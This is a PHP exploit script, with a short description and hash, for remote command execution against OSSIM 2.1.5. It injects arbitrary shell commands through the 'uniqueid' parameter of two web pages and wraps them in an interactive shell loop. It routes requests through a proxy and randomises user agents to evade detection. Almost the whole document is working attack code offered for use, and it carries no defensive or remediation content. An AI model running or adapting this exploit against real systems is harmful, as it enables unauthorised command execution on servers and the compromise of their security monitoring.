OSSIM version 2.1.5 remote command execution exploit that provides an interactive shell.
bef9966d950f3e0d9d428031d48dd2b827b0c0302d70ef1af2a23c9bec42655e
<?php
/*
* Remote Execution Exploit for OSSIM - Interactive Shell
* Affected Applications: Confirmed in OSSIM 2.1.5. Other versions may also be affected.
*
* Author: Ricardo Almeida
* email: ricardojba[at]aeiou[DoT]pt
*
* Credits: Researcher: Nahuel GrisolĂa
* ngrisolia <at> cybsec <dot> com
*/
function wrap($url){
$ua = array('Mozilla','Opera','Microsoft Internet Explorer','Chrome','Safari','Konqueror');
$op = array('Windows 7','Windows XP','Ubuntu','Windows Vista','ReactOS','OSX','Minix');
$agent = $ua[rand(0,3)].'/'.rand(1,8).'.'.rand(0,9).' ('.$op[rand(0,5)].' '.rand(1,7).'.'.rand(0,9).'; en-US;)';
$tor = '172.16.0.253:8080';
$timeout = '300';
$ack = curl_init();
curl_setopt ($ack, CURLOPT_PROXY, $tor);
curl_setopt ($ack, CURLOPT_URL, $url);
curl_setopt ($ack, CURLOPT_HEADER, 1);
curl_setopt ($ack, CURLOPT_USERAGENT, $agent);
curl_setopt ($ack, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ack, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ack, CURLOPT_TIMEOUT, $timeout);
$syn = curl_exec($ack);
$info = curl_getinfo($ack);
curl_close($ack);
if($info['http_code'] == '200') {
return $syn;
die();
} else {
return "Fail! :".$info['http_code']."\r\n";
}
}
if ($argc != 3) {die("Usage: $argv[0] <host> <url 1 or 2>\nEx: $argv[0] www.host.com 1\n");}
$host = $argv[1];
$url = $argv[2];
while(1){
fwrite(STDOUT, "[shell:~ # ");
$cmd = preg_replace('/ /','%20',trim(fgets(STDIN)));
if ($cmd == "exit" || $cmd == "quit") {die();};
if ($url == 1) {$attackurl1 = "http://".$host."/sem/wcl.php?uniqueid=1;".$cmd."%20%3E%20/tmp/listing";echo wrap($attackurl1);}
else if ($url == 2) {$attackurl2 = "http://".$host."/sem/storage_graphs.php?uniqueid=;".$cmd."%20%3E%20/tmp/listing;";echo wrap($attackurl2);}
}